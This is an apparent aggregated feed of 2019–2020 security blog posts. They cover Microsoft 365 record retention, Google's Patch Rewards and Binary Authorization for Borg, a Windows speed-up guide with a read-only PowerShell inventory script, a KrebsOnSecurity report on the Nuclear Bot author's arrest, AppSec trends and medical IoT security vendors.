Where we don’t yet have a connector for your solution, Microsoft Partners can provide a wide range of pre-built connectors or the ability to build custom connectors using our software development toolkit. To learn more, read Work with a partner to archive third-party data in Office 365.

In some cases, particularly where regulatory compliance—such as with the CFTC Rule 1.31(c)-(d), FINRA Rule 4511, and SEC Rule 17a-4—is needed, immutability of records must be maintained. These rules have specific requirements for electronic data storage, including many aspects of records management, such as the duration, format, quality, availability, and accountability of records retention. Microsoft provides the admin this ability in the Label settings. To do this, under Classify content as a “Record” with this label, select the Yes, classify as a regulatory “Record” dropdown option, and then under Retain this content, set the duration.

Screenshot of a label setting in the Office 365 Security & Compliance dashboard.

Once set, this option cannot be changed. Even admins are not able to change or delete the records.

Microsoft engaged Cohasset Associates to review this capability and provide an assessment document for consideration of our customers and their regulators. The assessment is available at: Data Protection Resources. Currently the assessment includes Exchange Online and will be extended to include SharePoint Online in mid-2020.

The ability to archive data inside the Microsoft 365 tenant with security controls intact and all the visibility and machine learning features of Microsoft 365 available is an advantage that many organizations can use, some with their existing licenses.

Learn more

To find out more about other advanced compliance features, check out Microsoft 365 compliance documentation. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Data governance and retention in your Microsoft 365 tenant—a secure and highly capable solution appeared first on Microsoft Security.

Announcing updates to our Patch Rewards program in 2020

At Google, we strive to make the internet safer and that includes recognizing and rewarding security improvements that are vital to the health of the entire web. In 2020, we are building on this commitment by launching a new iteration of our Patch Rewards program for third-party open source projects.

Over the last six years, we have rewarded open source projects for security improvements after they have been implemented. While this has led to overall improved security, we want to take this one step further.

Introducing upfront financial help
Starting on January 1, 2020, we’re not only going to reward proactive security improvements after the work is completed, but we will also complement the program with upfront financial support to provide an additional resource for open source developers to prioritize security work. For example, if you are a small open source project and you want to improve security, but don’t have the necessary resources, this new reward can help you acquire additional development capacity.

We will start off with two support levels:
  • Small ($5,000): Meant to motivate and reward a project for fixing a small number of security issues. Examples: improvements to privilege separation or sandboxing, cleanup of integer arithmetic, or more generally fixing vulnerabilities identified in open source software by bug bounty programs such as EU-FOSSA 2 (see ‘Qualifying submissions’ here for more examples).
  • Large ($30,000): Meant to incentivize a larger project to invest heavily in security, e.g. providing support to find additional developers, or implementing a significant new security feature (e.g. new compiler mitigations).
Nomination process

Anyone can nominate an open source project for support by filling out the nomination form. Our Patch Reward Panel will review submissions on a monthly basis and select a number of projects that meet the program criteria. The panel will let submitters know if a project has been chosen and will start working with the project maintainers directly.

Projects in scope

Any open source project can be nominated for support. When selecting projects, the panel will put an emphasis on projects that either are vital to the health of the Internet or are end-user projects with a large user base.

What do we expect in return?

We expect to see security improvements to open source software. Ideally, the project can provide us with a short blurb or pointers to some of the completed work that was possible because of our support. We don’t want to add bureaucracy, but would like to measure the success of the program.

What about the existing Patch Rewards program?

This is an addition to the existing program; the current Patch Rewards program will continue as it stands today.

Increasing Industry Participation and Knowledge

Increasing industry participation and knowledge is a core pillar in the PCI Security Standards Council’s strategic framework, which guides how the Council achieves its mission and supports the needs of the global payments industry. To round out our Q&A blog series introducing the framework, we interview PCI SSC Executive Director Lance Johnson on this foundational strategic pillar and how it ties the framework together.

LifeLabs Paid Hackers to Recover Stolen Medical Data of 15 Million Canadians

LifeLabs, the largest provider of healthcare laboratory testing services in Canada, has suffered a massive data breach that exposed the personal and medical information of nearly 15 million Canadian customers. The company announced the breach in a press release posted on its website, revealing that an unknown attacker gained unauthorized access to its computer systems last month and stole customers

How to Speed Up a Slow PC Running Windows OS

Working with a slow PC is always annoying and frustrating. Enduring sudden frozen windows and stuttered animations can make you want to throw the machine out the window.

Take a deep breath, and consider these 8 tips on how to fix a slow PC running Windows.



Why is my Windows Running Slow?

First, here is a general analysis on why your Windows PC is running slow:

  • Your computer is running out of memory (RAM)
  • Your PC’s power and performance mode settings
  • There are too many startup items and background programs
  • Useless features or animation
  • Insufficient disk space
  • A cluttered registry
  • Malware and Virus Infection
  • Unneeded third-party software

1. Restart your Computer

Many users are accustomed to keeping their computers running for several weeks. Their PC is either running or sleeping with the processes saved all the time. This means the running programs are occupying and filling up their RAM continuously, which can lead to the PC running extremely slowly. In addition, the computer might suffer from some bugs, which trigger programs to eat up much more RAM than they should. To avoid these troubles, restart your PC by clicking on the Windows button, selecting the ‘Power’ button, and choosing the ‘Restart’ button at least once a week.

A small hint: make sure you have saved your ongoing work before you shut down your computer.

2. Adjust setting modes

This is a very simple but often overlooked way to boost your PC’s performance. However, it sacrifices a bit of standby time. When you are not worrying about the state of charge and just pursuing maximum efficiency, you can consider opening Advanced System Setting in Windows for this trick.

Enter “Control Panel” in the Cortana search box in the taskbar. In the pop-up window, click “System,” and then click “Advanced system settings” in the left window, as shown below:

Click “Settings” in the performance bar, as shown in the following figure:

In the pop-up window, you can see that there are four setting modes, set “Adjust for best performance,” and then click OK, as shown in the following figure:

3. Disable Startup Programs

Startup items are programs that the system runs in the foreground or background as soon as your computer is on. When you download and install software, “run at startup” is usually enabled by default. If the software is not commonly used and you do not need it every time you start your PC, clear that checkbox, because every startup item slows the system down. If you forgot to clear it when installing the application, you can also make the change later in Task Manager.

To check and manage your startup programs, open the Task Manager (Ctrl + Alt + Del), then switch to the ‘Startup’ tab. You’ll also see the “Startup impact” of each startup program — either Low, Medium, or High. If you see “Not measured,” that’s because it was recently added and Windows hasn’t had a chance to observe the program’s behavior yet.

To prevent a program from launching on startup just right-click and choose “Disable.”

If you are not sure whether you can safely disable some programs, you can search the program online and learn about its function. If you are a little worried, you can download a PC cleaner app, which can automatically identify and classify these items and help you delete the unnecessary ones in batches. Remember to choose those apps without pop-up advertisements and hidden fees.

In addition, you can see the first tab named “Processes” in the picture above. Too many programs running simultaneously can slow down the system speed as well. Some programs may continue running in the background even after you have closed them. Under the “Processes” tab, you can select them and click ‘End task’ at the bottom right. However, be careful about this action because you might close some important processes needed to run Windows.

4. Turn off Windows tips and tricks

When you search online for ways to speed up your PC, the advice you find will often tell you to disable the “Visual Effects” feature because it consumes your PC’s performance. However, that approach requires you to balance operating speed against the appearance of your PC, and you may have to adjust those settings many times before the result looks acceptable. Instead, here is an item that you can change without any such trade-off.

When you use a Windows PC, Windows constantly pays attention to what you are doing and offers tips on what you may want to do with your computer. You may find these tips unhelpful and even feel uneasy about Windows constantly looking over your shoulder.

If you want to speed up your PC, you can ask Windows to stop giving you advice. To do this, click the START button, select the Settings icon, and then go to System > Notifications & actions. Scroll down to the notifications section and uncheck the box labeled “Get tips, tricks, and suggestions as you use Windows.”

5. Run Disk Cleanup

Do not let that “Disk space is almost full” message pop up and stop your work. Too many junk files, useless big files and duplicate files usually cause insufficient disk space. To save gigabytes of disk space for things you really need, you should clean them regularly to free up space.

Here are the steps for using the built-in Windows utility to run Disk Cleanup:

Press “WINDOWS + R” and run the cleanmgr command with the /sageset switch, giving it a profile number (the number itself is arbitrary, but the same number is reused in the next step):

cleanmgr /sageset:99

In the Disk Cleanup Settings window, you can see the categories of files that can be cleaned and tick the ones you want.

Note that this step only stores your selection of checked items under profile 99; nothing has actually been cleaned yet. After clicking OK, press “WINDOWS + R” again and enter “cleanmgr /sagerun:99” to execute the cleanup operations you configured.

You can also turn ON the storage sense function to remove unnecessary files automatically.

Enter Settings > System > Storage, and then turn ON the Storage sense function to allow Windows to clean up temporary files automatically. It can be set to run automatically every day, every fortnight, every month, or every two months.

Some cleanup apps can, of course, do this work more quickly and thoroughly. Besides useless files, they can even find and delete near-duplicate photos. Evaluate and download them according to your own needs.

6. Clean out your Registry

The registry is an important database that stores the configuration of the Windows system and of the application programs running on it. It first appeared as early as Windows 3.0, when OLE technology was introduced. Windows NT was the first operating system to make extensive use of the registry at the system level, and since Microsoft Windows 95 it has been a critical database that continues to play a role in every subsequent version of Windows.

The commands that open the Registry Editor are:

regedit (or regedit.exe) and regedt32 (or regedt32.exe)

Under normal circumstances, you open the Run dialog from the START menu (or press WINDOWS + R), enter regedit or regedit.exe, and click OK to open the Windows Registry Editor.

The registry accumulates clutter easily. For example, when a program is uninstalled, its settings are not always removed from the registry, so over time the registry fills up with outdated entries. This may lead to poor performance of your PC.

A word of caution: Editing the registry manually is risky. A mistake can lead to system-level interruptions. Therefore, to clean the registry, it is recommended that a professional registry cleaner is used.

7. Malware and Virus Infection

As we all know, malware and viruses will infect the computer and make it run more sluggishly. There are a large number of antivirus apps in the marketplace. Trend Micro offers several options to consider.

8. Disable third-party services

If you have installed a lot of software on your PC, the system may become cluttered and unexpected problems can occur. For example, several security applications running at the same time can conflict and make the system misbehave. You can disable all third-party software services and keep only the system’s own services; this state is called a “Clean Boot.”

Here is how to perform a clean boot of Windows:

Press “WINDOWS + R”, type “msconfig”, and click OK. In System Configuration, go to the Services tab, tick the “Hide all Microsoft services” box at the bottom left so that only third-party services remain in the list, then select the items and click Disable all. Note that this also stops any third-party antivirus or backup services, so re-enable them once you have finished troubleshooting.
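As an added example that is not part of the original post, the following PowerShell script produces a read-only inventory of the startup entries that section 3 manages in Task Manager and of the non-Microsoft services that section 8’s “Hide all Microsoft services” step reveals, so you can review them before disabling anything. It assumes Windows PowerShell 5.1 or later on Windows; the function names and the Authenticode-signature test used to classify a service as Microsoft’s are my own choices.

```powershell
# Added example (not from the original post): inventory startup entries (section 3)
# and third-party services (section 8) without modifying anything.
# Assumes Windows PowerShell 5.1 or later; function names are hypothetical.

function Get-StartupEntries {
    # Per-machine and per-user Run/RunOnce keys, plus both Startup folders.
    $runKeys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Get-ItemProperty adds these provider properties; they are not startup values.
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $values = Get-ItemProperty -Path $key
        foreach ($prop in $values.PSObject.Properties) {
            if ($providerProps -contains $prop.Name) { continue }
            [pscustomobject]@{
                Source  = $key
                Name    = $prop.Name
                Command = [string]$prop.Value
            }
        }
    }
    foreach ($folder in 'Startup', 'CommonStartup') {
        $path = [Environment]::GetFolderPath($folder)
        if (-not $path -or -not (Test-Path $path)) { continue }
        Get-ChildItem -Path $path -File | ForEach-Object {
            [pscustomobject]@{ Source = $path; Name = $_.Name; Command = $_.FullName }
        }
    }
}

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # A service's PathName may be quoted and may carry arguments; keep only the
    # executable. An unquoted path containing spaces is truncated at the first
    # space, which makes it show up as "unsigned" below (worth a look anyway).
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(\S+)') { return $Matches[1] }
    return $PathName
}

function Get-ThirdPartyServices {
    # Same idea as msconfig's "Hide all Microsoft services": a service counts as
    # Microsoft's only if its binary carries a valid Microsoft Authenticode signature.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $exe = Get-ServiceBinaryPath -PathName $_.PathName
        $signer = 'unsigned or unreadable'
        if ($exe -and (Test-Path $exe)) {
            $sig = Get-AuthenticodeSignature -FilePath $exe
            if ($sig.Status -eq 'Valid' -and $sig.SignerCertificate) {
                $signer = $sig.SignerCertificate.Subject
            }
        }
        if ($signer -notmatch 'Microsoft') {
            [pscustomobject]@{
                Name      = $_.Name
                StartMode = $_.StartMode
                State     = $_.State
                Binary    = $exe
                Signer    = $signer
            }
        }
    }
}

"== Startup entries (Task Manager > Startup, section 3) =="
Get-StartupEntries | Format-Table -AutoSize

"== Non-Microsoft services (msconfig > Services, section 8) =="
Get-ThirdPartyServices | Sort-Object StartMode, Name | Format-Table -AutoSize
```

Automatic-start services in the second table that you do not recognise are the ones to research first; anything whose Signer is a security, backup or driver vendor you rely on should stay enabled.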

We hope the listed solutions can help you boost your PC performance conveniently. Manually checking what is wrong with your Windows can be time-consuming and painstaking. When those irritating system messages pop up and interfere with your work, it is time to turn to a trusted all-in-one system care utility like Cleaner One. By employing this productive worker, you can retrieve and delete unnecessary items, have less clutter, make your computer more efficient, and optimize your Windows OS with just a few clicks. Why not give it a go?

The post How to Speed Up a Slow PC Running Windows OS appeared first on .

Profile of a Hacker Guild

It’s no surprise there is a massive cybersecurity skills gap that has left technical teams searching for any experienced talent they can find. Unfortunately, many curious minds trying to break into the field are often surprised by the shortage of training programs and junior level opportunities that could help close the skills gap in the long term. For example, a recent survey identified that 81% of ethical hackers are self-taught - a staggering number that shows the relative lack of formal educational opportunities available to future talent. 

14 Ways to Evade Botnet Malware Attacks On Your Computers

Cybercriminals are busy innovators, adapting their weapons and attack strategies, and ruthlessly roaming the web in search of their next big score. Every manner of sensitive information, such as confidential employee records, customers' financial data, protected medical documents, and government files, are all subject to their relentless threats to cybersecurity. Solutions span a broad

Norsk Hydro responds to ransomware attack with transparency

Last March, aluminum supplier Norsk Hydro was attacked by LockerGoga, a form of ransomware. The attack began with an infected email and locked the files on thousands of servers and PCs. All 35,000 Norsk Hydro employees across 40 countries were affected. In the throes of this crisis, executives made three swift decisions:

  • Pay no ransom.
  • Summon Microsoft’s cybersecurity team to help restore operations.
  • Communicate openly about the breach.

Read Hackers hit Norsk Hydro with ransomware to learn why this approach helped the company recover and get back to business as usual.

The post Norsk Hydro responds to ransomware attack with transparency appeared first on Microsoft Security.

This Bug Could Have Let Anyone Crash WhatsApp Of All Group Members

WhatsApp, the world's most popular end-to-end encrypted messaging application, patched an incredibly frustrating software bug that could have allowed a malicious group member to crash the messaging app for all members of the same group, The Hacker News learned. Just by sending a maliciously crafted message to a targeted group, an attacker can trigger a fully-destructive WhatsApp crash-loop,

Nuclear Bot Author Arrested in Sextortion Case

Last summer, a wave of sextortion emails began flooding inboxes around the world. The spammers behind this scheme claimed they’d hacked your computer and recorded videos of you watching porn, and promised to release the embarrassing footage to all your contacts unless a bitcoin demand was paid. Now, French authorities say they’ve charged two men they believe are responsible for masterminding this scam. One of them is a 21-year-old hacker interviewed by KrebsOnSecurity in 2017 who openly admitted to authoring a banking trojan called “Nuclear Bot.”

On Dec. 15, the French news daily Le Parisien published a report stating that French authorities had arrested and charged two men in the sextortion scheme. The story doesn’t name either individual, but rather refers to one of the accused only by the pseudonym “Antoine I.,” noting that his first name had been changed (presumably to protect his identity because he hasn’t yet been convicted of a crime).

“According to sources close to the investigation, Antoine I. surrendered to the French authorities at the beginning of the month, after being hunted down all over Europe,” the story notes. “The young Frenchman, who lived between Ukraine, Poland and the Baltic countries, was indicted on 6 December for ‘extortion by organized gang, fraudulent access to a data processing system and money laundering.’ He was placed in pre-trial detention.”

According to Le Parisien, Antoine I. admitted to being the inventor of the initial 2018 sextortion scam, which was subsequently imitated by countless other ne’er-do-wells. The story says the two men deployed malware to compromise at least 2,000 computers that were used to blast out the sextortion emails.

While that story is light on details about the identities of the accused, an earlier version of it published Dec. 14 includes more helpful clues. The Dec. 14 piece said Antoine I. had been interviewed by KrebsOnSecurity in April 2017, where he boasted about having created Nuclear Bot, a malware strain designed to steal banking credentials from victims.

My April 2017 exposé featured an interview with Augustin Inzirillo, a young man who came across as deeply conflicted about his chosen career path. That path became traceable after he released the computer code for Nuclear Bot on GitHub. Inzirillo outed himself by defending the sophistication of his malware after it was ridiculed by both security researchers and denizens of the cybercrime underground, where copies of the code wound up for sale. From that story:

“It was a big mistake, because now I know people will reuse my code to steal money from other people,” Inzirillo told KrebsOnSecurity in an online chat.

Inzirillo released the code on GitHub with a short note explaining his motivations, and included a contact email address at a domain set up long ago by his father, Daniel Inzirillo.

KrebsOnSecurity also reached out to Daniel, and heard back from him roughly an hour before Augustin replied to requests for an interview. Inzirillo the elder said his son used the family domain name in his source code release as part of a misguided attempt to impress him.

“He didn’t do it for money,” said Daniel Inzirillo, whose CV shows he has built an impressive career in computer programming and working for various financial institutions. “He did it to spite all the cyber shitheads. The idea was that they wouldn’t be able to sell his software anymore because it was now free for grabs.”

If Augustin Inzirillo ever did truly desire to change his ways, it wasn’t clear from his apparent actions last summer: The Le Parisien story says the sextortion scams netted the Frenchman and his co-conspirator at least a million Euros.

In August 2018, KrebsOnSecurity was contacted by a researcher working with French authorities on the investigation who said he suspected the young man was bragging on Twitter that he used a custom version of Nuclear Bot dubbed “TinyNuke” to steal funds from customers of French and Polish banks.

The source said this individual used the now-defunct Twitter account @tiny_gang1 to taunt French authorities, while showing off a fan of 100-Euro notes allegedly gained from his illicit activities (see image above). It seemed to the source that Inzirillo wanted to get caught, because at one point @tiny_gang1 even privately shared a copy of Inzirillo’s French passport to prove his identity and accomplishments to the researcher.

“He modified the Tinynuke’s config several times, and we saw numerous modifications in the malware code too,” the source said. “We tried to compare his samples with the leaked code available on GitHub and we noticed that the guy actually was using a more advanced version with features that don’t exist in the publicly available repositories. As an example, custom samples have video recording functionality, socks proxy and other features. So the guy clearly improved the source code and recompiled a new version for every new campaign.”

The source said the person behind the @tiny_gang Twitter account attacked French targets with custom versions of TinyNuke in one to three campaigns per week earlier this year, harvesting French bank accounts and laundering the stolen funds via a money mule network based mostly in the United Kingdom.

“If the guy behind this campaign is the malware author, it could easily explain the modifications happening with the malware, and his French is pretty good,” the researcher told KrebsOnSecurity. “He’s really provocative and I think he wants to be arrested in France because it could be a good way to become famous and maybe prove that his malware works (to resell it after?).”

The source said the TinyNuke author threatened him with physical harm after the researcher insulted his intelligence while trying to goad him into disclosing more details about his cybercrime activities.

“The guy has a serious ego problem,” the researcher said. “He likes when we talk about him and he hates when we mock him. He got really angry as time went by and started personally threatening me. In the last [TinyNuke malware configuration file] targeting Poland we found a long message dedicated to me with clear physical threats.”

All of the above is consistent with the findings detailed in the Le Parisien report, which quoted French investigators saying Antoine I. in October 2019 used a now-deleted Twitter account to taunt the authorities into looking for him. In one such post, he included a picture of himself holding a beer, saying: “On the train to Naples. You should send me a registered letter instead of threatening guys informally.”

The Le Parisien story also said Antoine I. threatened a researcher working with French authorities on the investigation (the researcher is referred to pseudonymously as “Marc”).

“I make a lot more money than you, I am younger, more intelligent,” Antoine I. reportedly wrote in July 2018 to Marc. “If you do not stop playing with me, I will put a bullet in your head.”

French authorities say the defendant managed his extortion operations while traveling throughout Ukraine and other parts of Eastern Europe. But at some point he decided to return home to France, despite knowing investigators there were hunting him. According to Le Parisien, he told the French authorities he wanted to cooperate in the investigation and that he no longer wished to live like a fugitive.

Protecting programmatic access to user data with Binary Authorization for Borg

At Google, the safety of user data is our paramount concern and we strive to protect it comprehensively. That includes protection from insider risk, which is the possible risk that employees could use their organizational knowledge or access to perform malicious acts. Insider risk also covers the scenario where an attacker has compromised the credentials of someone at Google to facilitate their attack. There are times when it’s necessary for our services and personnel to access user data as part of fulfilling our contractual obligations to you: as part of their role, such as user support; and programmatically, as part of a service. Today, we’re releasing a whitepaper, “Binary Authorization for Borg: how Google verifies code provenance and implements code identity,” that explains one of the mechanisms we use to protect user data from insider risks on Google's cluster management system Borg.

Binary Authorization for Borg is a deploy-time enforcement check

Binary Authorization for Borg, or BAB, is an internal deploy-time enforcement check that reduces insider risk by ensuring that production software and configuration deployed at Google is properly reviewed and authorized, especially when that code has the ability to access user data. BAB ensures that code and configuration deployments meet certain standards prior to being deployed. BAB includes both a deploy-time enforcement service to prevent unauthorized jobs from starting, and an audit trail of the code and configuration used in BAB-enabled jobs.

BAB ensures that Google's official software supply chain process is followed. First, a code change is reviewed and approved before being checked into Google's central source code repository. Next, the code is verifiably built and packaged using Google's central build system. This is done by creating the build in a secure sandbox and recording the package's origin in metadata for verification purposes. Finally, the job is deployed to Borg, with a job-specific identity. BAB rejects any package that lacks proper metadata, that did not follow the proper supply chain process, or that otherwise does not match the identity’s predefined policy.

Binary Authorization for Borg allows for several kinds of security checks

BAB can be used for many kinds of deploy-time security checks. Some examples include:
  • Is the binary built from checked in code?
  • Is the binary built verifiably?
  • Is the binary built from tested code?
  • Is the binary built from code intended to be used in the deployment?
After deployment, a job is continuously verified for its lifetime, to check that jobs that were started (and any that may still be running) conform to updates to their policies.

Binary Authorization for Borg provides other security benefits
Though the primary purpose of BAB is to limit the ability of a potentially malicious insider to run an unauthorized job that could access user data, BAB has other security benefits. BAB provides robust code identity for jobs in Google’s infrastructure, tying a job’s identity to specific code, and ensuring that only the specified code can be used to exercise the job identity’s privileges. This allows for a transition from a job identity—trusting an identity and any of its privileged human users transitively—to a code identity—trusting a specific piece of reviewed code to have specific semantics and which cannot be modified without an approval process.

BAB also dictates a common language for data protection, so that multiple teams can understand and meet the same requirements. Certain processes, such as those for financial reporting, need to meet certain change management requirements for compliance purposes. Using BAB, these checks can be automated, saving time and increasing the scope of coverage.

Binary Authorization for Borg is part of the BeyondProd model
BAB is one of several technologies used at Google to mitigate insider risk, and one piece of how we secure containers and microservices in production. By using containerized systems and verifying their BAB requirements prior to deployment, our systems are easier to debug, more reliable, and have a clearer change management process. More details on how Google has adopted a cloud-native security model are available in another whitepaper we are releasing today, “BeyondProd: A new approach to cloud-native security.”

In summary, implementing BAB, a deploy-time enforcement check, as part of Google’s containerized infrastructure and continuous integration and deployment (CI/CD) process has enabled us to verify that the code and configuration we deploy meet certain standards for security. Adopting BAB has allowed Google to reduce insider risk, prevent possible attacks, and also support the uniformity of our production systems. For more information about BAB, read our whitepaper, “Binary Authorization for Borg: how Google verifies code provenance and implements code identity.”

Additional contributors to this whitepaper include Kevin Chen, Software Engineer; Tim Dierks, Engineering Director; Maya Kaczorowski, Product Manager; Gary O’Connor, Technical Writing; Umesh Shankar, Principal Engineer; Adam Stubblefield, Distinguished Engineer; and Wilfried Teiken, Software Engineer; with special recognition to the entire Binary Authorization for Borg team for their ideation, engineering, and leadership.

AppSec Themes to Watch in 2020


Paul Farrington, Veracode EMEA CTO

Pejman Pourmousa, Veracode VP of Services

Chris Wysopal, Veracode CTO and co-founder

As we said in the introduction to our 10th anniversary State of Software Security report this year, the last 10 years in AppSec saw both enormous change, and a fair amount of stagnation. Part of the reason for the stagnation is that software development is increasing at unprecedented rates, and security is often struggling to keep up. So as we shift our focus from reflection to prediction, we think application security in 2020 will be all about new solutions and best practices to keep up with the pace of development and empower developers to code both quickly and securely. A few AppSec themes we expect to see renewed focus on in 2020 include:

Security champions

With a security skills shortage, and an explosion of software development, it’s time to get creative to spread security skills and know-how across development teams. A security champions program is becoming a popular way to do this, and we expect to see more of these programs in 2020. In a recently released report, Building an Enterprise DevSecOps Program, security analyst Adrian Lane notes, “I spoke with three midsized firms this week — their development personnel ranged from 800-2000 people, while their security teams ranged from 12 to 25.” In the same report, he says of assigning security champions to development teams, “Regardless of how you do it, this is an excellent way to scale security without scaling headcount, and we recommend you set aside some budget and resources — it returns far more benefits than it costs.”

A security champion is a developer with an interest in security who helps amplify the security message at the team level. Security champions don’t need to be security pros; they just need to act as the security conscience of the team, keeping their eyes and ears open for potential issues. Once the team is aware of these issues, it can then either fix the issues in development or call in your organization’s security experts to provide guidance.

With a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.

Metrics that make sense

Metrics — or perhaps more accurately, the right metrics — are crucial for understanding what’s really happening in your AppSec program. They serve a dual purpose: They demonstrate your organization’s current state, and also show what progress it’s making in achieving its objectives. 

On the flip side, focusing on the wrong metrics can lead to frustration, disengagement, and a stalled program. If you’ve got an overly stringent AppSec policy – for instance, “fix all flaws found within two weeks” – your metrics will not paint a pretty picture, and your developers will give up before they’ve begun. We think 2020 will be the year of getting AppSec metrics right with smart, achievable, sensible AppSec policies.

We will increasingly see a focus on providing developers with simple cues to encourage the right behavior, but in a realistic way. For example, teams start by classifying those security bugs that are highest priority, those that are important but not showstoppers, and those that, although not ideal, are acceptable to exist. Especially for the first two categories, they then track the average time to fix a security bug, baseline, and then negotiate targets so that engineers and product owners can buy-in. These metrics may ultimately help to determine compensation, but perhaps initially are linked to softer benefits for the team.

Security across the pipeline

We’re seeing organizations start to build security into each phase of the development pipeline, and expect to see more of this shift in 2020. From pre-commit scans in the IDE (my code), to build scans in the CI pipeline (our code), to deployment scans in the CD pipeline (production code), security testing will cover code from inception to production.


DevSecOps is no longer niche—organizations are moving faster and producing more software than ever before. Scaling is the name of the AppSec game in 2020. AppSec programs that are cumbersome or slow to scale will not last in this new decade. What are the keys to scaling AppSec?

A SaaS-based solution: The time and budget required to quickly scale an on-premises AppSec solution make it ill equipped for a modern DevSecOps environment.

Expert help: Outside AppSec expertise can be useful in helping to establish your security program’s goals and roadmap. More importantly, it can help keep your roadmap on track by guiding developers through the fixing of flaws your scans find.

Security champions: As we discussed in the section above, security champions will be key to doing more with less security staff.


More and more security regulations are specifically calling out the need for application security – from NIST, to PCI, NY DFS, and GDPR. In turn, the need for a documented application security process will become paramount in the new year. The Financial Services Sector Cybersecurity Profile from the FSSCC is an example of how FinTech firms are trying to unify reporting standards for the various regulatory frameworks.

Demand for secure software

IT buyers are increasingly questioning the security of software they are purchasing. If you can’t answer questions about your security practices or can’t address your customers’ audit requirements, you’re likely to experience lost or delayed sales opportunities. In some cases, prospects will turn elsewhere. However, vendors that can address these security concerns quickly and effectively stand out among suppliers and leverage security as a competitive advantage. A recent survey report we conducted with IDG found that 96 percent of respondents are more likely to consider doing business with a vendor or partner whose software has been independently verified as “secure.”

In addition, thanks to the speed of modern software delivery, we will see the methods for attesting to the security of software change. For example, we anticipate a shift to process-based attestations, such as proof of the security of an application’s development process (as with Veracode Verified), rather than point-in-time third-party pen tests. Point-in-time tests will carry less and less weight as the speed of software updates and changes increase.

What’s behind this demand for proof of security? It stems in part from new, more dire impacts from security breaches. When Target was breached in 2013, it created headlines for a few weeks, but it didn’t really affect its bottom line. Today, that has changed. Now we are seeing acquisitions fail, CEOs lose jobs, and stock values take hits because of breaches. Proving your software is secure will give companies an advantage in 2020.  

Learn more

Continue the conversation – join our upcoming webinar, AppSec in 2020: What’s on the Horizon.

The 2020 State of Breach Protection Survey – Call for Participation

2010-2019 decade will be remembered as the time in which cybersecurity became acknowledged as a critical concern for all organizations. With rapidly growing security needs and respective budgets, it is now more essential than ever for security decision-makers to zoom out of the 'products' mindset and assess their security stack in light of the overall breach protection value that their

5 Promising vendors focusing on Cyber Security for Medical IoT (IoMT)

Medical IoT devices operate in care facility environments that encompass care giving, case management, customer service, and clinic management. As such, the risk to data gathered and managed by medical devices extends beyond the device itself. A compromise of clinic management services can propagate to IoT device command and control, allowing compromise of devices in attacks that never directly touch the device at all. This is clearly the major driver for the emerging category of “Medical IoT (IoMT) Cyber Security”.

A large hospital, for example, could be home to as many as 85,000 connected devices. While each of these devices has a significant role in the delivery of care and operational efficiency, each connected device also opens the door to a malicious cyberattack. A recent report from Irdeto found that 82 percent of healthcare organizations’ IoT devices have been targeted with a cyberattack within the last year.

Looking at the players in this industry, it is clear that the Medical IoT security category spans a number of different approaches, all sharing the same goal: giving the customer clear asset discovery and timely alerting on security breaches and attacks in its medical environment.

Although many large security players are addressing this niche too, CyberDB identified a number of emerging players that are focusing on this industry and as such we expect them to benefit from the growth in this market. These players are (in alphabetical order):

Due to the clear use case and the growing awareness and need in this market, we can see general-purpose IoT security players moving towards the Medical IoT security market.

According to a recent report by BisResearch, the overall Medical IoT cyber security market has been growing steadily. The market is expected to continue to grow at a double-digit CAGR of 41.38% during the forecast period 2019-2028.

CyberMDX is a pioneer in medical cyber security, delivering visibility, threat prevention and analytics for medical and IoT devices and clinical assets. It is a best of breed product built from the ground up for healthcare delivery organizations. CyberMDX is established in 2017, acts globally and raised so far $10M of funds. Its headquarters reside in Tel Aviv & New York City

CyberMDX counters and prevents growing cyber-threats against hospitals, ensuring the operational continuity of their critical assets as well as patient and data safety. CyberMDX delivers endpoint visibility, network threat prevention and operational analytics for medical, IoT, and OT devices. The agentless solution automates the most granular, context-aware device profiling available on the market and combines it with healthcare-tailored risk assessment and remediation capabilities.

Using CyberMDX, healthcare teams can easily:

  • Audit devices for software vulnerabilities and prioritize patching
  • Detect malicious activity and behavioral anomalies, triggering responses accordingly
  • Manage risks proactively via smart micro-segmentation planning and automation
  • Streamline clinical compliance programs
  • Report device-relevant FDA recalls
  • Optimize device allocation and procurement decisions based on usage insights
  • Track and manage medical asset lifecycles
  • Provide rich reports in support of HIPAA and corporate compliance efforts
  • Seamlessly integrate with existing cyber and IT solutions to enrich data sets, enhance workflows, and enable operational excellence


  1. Interdepartmental HDO functionality and true workflow enablement: CyberMDX takes a holistic, 360° view of healthcare organizations and understands that only by building a common frame of reference and cross-departmental synergies can wholesale progress be achieved. Beyond mere security, CyberMDX provides security, IT, clinical engineering and compliance teams with a platform for data-driven workflow enablement and collaboration.
  2. Unmatched, context-aware visibility: CyberMDX delivers deep visibility into medical devices, protocols, and connected things of all sorts — along with a clear-eyed view of their clinical context. This deep and contextual visibility drives prevention, incident response, risk mitigation, and lifecycle management (including patch availability notifications). The solution covers medical devices, IoT, and OT across the entire network — providing a single pane of glass from which to view all connected healthcare assets.
  3. Superior depth and breadth of risk reporting around clinical and critical assets: CyberMDX has a dedicated research team focused solely on connected healthcare and IoMT. The team works with medical device manufacturers and regulatory bodies such as CISA, ECRI, MITRE and the FDA to spot and lock down cybersecurity hazards and vulnerabilities before they can be exploited by malicious actors.

Cynerio was established in 2017 by a versatile team with expertise in cybersecurity, medical devices, and healthcare IT. Headquartered in New York City, Cynerio works with leading Healthcare Delivery Organizations (HDOs) worldwide and delivers the only medical-first cybersecurity solution clinical ecosystems require to stay secure and operate with the peace of mind they need to put their focus where it’s needed most: on patient care.

The Problem

